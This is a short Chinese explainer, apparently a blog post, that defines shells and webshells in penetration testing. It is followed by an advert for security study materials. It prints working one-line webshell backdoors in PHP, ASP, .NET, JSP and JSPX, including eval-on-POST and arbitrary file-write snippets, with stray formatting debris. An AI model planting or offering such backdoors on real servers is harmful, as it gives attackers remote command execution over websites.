渗透测试中说的Shell和Webshll到底是什么

💻Shell

Shell其实是主机的管理员权限，外行人听着好牛逼。For Example:

• Windows中就是PowerShell
• Linux中就是root权限

📺webshell

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门，得到一个命令执行环境，以达到控制网站服务器的目的。

📹webshell分类

webshell根据脚本类型可以分为

• PHP脚本木马

 <?php @eval($_POST[value]);?>

    
    

    
    
1

• ASP脚本木马

<%execute(request(“value”))%>

    
    

    
    
1

• .NET脚本木马

<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"value");%>

    
    

    
    
1

• JSP脚本木马

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

    
    

    
    
1
2
3

• JSPX脚本木马

<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>

    
    

    
    
1
2

根据时代和技术的变迁，国外也有用python编写的脚本木马，不过国内常用的无外乎三种，大马，小马，一句话木马。

🚟网络安全2021必备资料&渗透测试&面试

不管你是小白还是工作已久不管你在面试还是已跳槽，都应该好好看看这份资料真的超级超级全面几乎打败了市面上90%的自学资料并覆盖了整个网络安全 来 肝了它！肯定会对你有帮助！

2021最新整理网络安全\渗透测试/运维安全学习资料（全套视频、大厂面经、精品手册。必备工具包）

网络安全面试题


SRC技术文档（共186页）干货满满！！

工具包（最多，不用费劲搜索）